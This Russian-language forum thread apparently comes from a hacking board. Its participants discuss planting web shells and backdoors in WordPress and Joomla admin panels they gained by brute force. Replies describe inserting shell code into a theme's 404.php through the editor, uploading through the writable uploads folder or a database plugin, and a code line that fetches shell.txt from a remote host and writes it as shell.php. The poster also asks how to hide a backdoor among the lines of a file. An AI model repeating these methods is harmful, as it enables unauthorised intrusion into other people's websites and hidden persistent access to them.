|
Накопилось достаточно много доступов в админки вордпресс,джумлу с брута.В большинство не получается залиться.Думаю не хватает прав на запись.Если я дам несколько доступов,может кто-нибудь посмотрет,возможно ли туда залиться в принципе или можно забить на это дело?
|
Закинь один из WP в личку, гляну.
С плагинами есть хитрость - можно менять исходник, но иногда сохранение дропается, т.к. количество строк шела значительно превышает размер кода плагина. В таком случае, надо выбрать самый объемный или установить что-то. |
Как варик побовать пролить шелл ли в тему ил в плагины, или же произвести установку, + пробовать залить как медиа в папку аплоадс, которая почти всегда открыта для записи.
Другой вариант попробовать взять аплоадер уже написаний и пролить. |
По WordPress вопрос в личке закрыли, что касается jooml'ы вопрос открыт.
Я ее не трогаю - брезгываю. |
Если стоит плагин для управления бд сайта можно через mysql попробовать залить.
|
Да,с джумлай пока непонятки...
|
Странно, а что сложного в заливке шелла на WP? Берешь заходишь в -> Внешний Вид -> Редактор -> 404.php и туда пихаешь код шелла, заливаешься в нужное место, а потом код 404 страницы ставишь на место.
(На будущее) |
приму к сведению
|
не получается организовать бэкдор таким способом:
в темах или другом месте в файл .php вставляю по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор |
Цитата:
Код:
Код:
site.ru/example.php?cmd=$url = "http://site.ru/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h); |
Спасибо за помощь.Действительно не сложно.Вернее сложно в первый раз,потом легче.У меня
срабатывает только ,если помещать в первую строку файла.Это бросается в глаза,когда открываешь файл.Есть способ втюхать между строк,в общем ,как нибудь замаскировать ? |
Цитата:
Код:
grep -rl "eval" /var/www/ |
| Время: 22:15 |